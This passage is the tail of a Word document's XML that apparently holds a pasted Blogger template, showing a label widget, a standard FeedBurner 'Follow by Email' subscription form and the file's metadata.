        <w:t xml:space="preserve">          &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:loop values='data:labels' var='label'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;span expr:class='&amp;quot;label-size label-size-&amp;quot; + data:label.cssSize'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:if cond='data:blog.url == data:label.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;span expr:dir='data:blog.languageDirection'&gt;&lt;data:label.name/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;a expr:dir='data:blog.languageDirection' expr:href='data:label.url'&gt;&lt;data:label.name/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:if cond='data:showFreqNumbers'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;span class='label-count' dir='ltr'&gt;(&lt;data:label.count/&gt;)&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='FollowByEmail1' locked='false' title='Follow by Email' type='FollowByEmail' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;&lt;h2 class='title'&gt;&lt;data:title/&gt;&lt;/h2&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='follow-by-email-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;form action='https://feedburner.google.com/fb/a/mailverify' expr:onsubmit='&amp;quot;window.open(\&amp;quot;https://feedburner.google.com/fb/a/mailverify?uri=&amp;quot; + data:feedPath + &amp;quot;\&amp;quot;, \&amp;quot;popupwindow\&amp;quot;, \&amp;quot;scrollbars=yes,width=550,height=520\&amp;quot;); return true&amp;quot;' method='post' target='popupwindow'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;table width='100%'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;input class='follow-by-email-address' name='email' placeholder='Email address...' type='text'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;td width='64px'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;input class='follow-by-email-submit' type='submit' value='Submit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;input expr:value='data:feedPath' name='uri' type='hidden'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;input name='loc' type='hidden' value='en_US'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;span class='item-control blog-admin'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA55B8" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/b:section-contents&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BA55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0123"/>
    <w:rsid w:val="00760123"/>
    <w:rsid w:val="00BA5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49841</Words>
  <Characters>284099</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2367</Lines>
  <Paragraphs>666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 7</dc:creator>
  <cp:lastModifiedBy>WIN 7</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-21T05:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-21T05:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>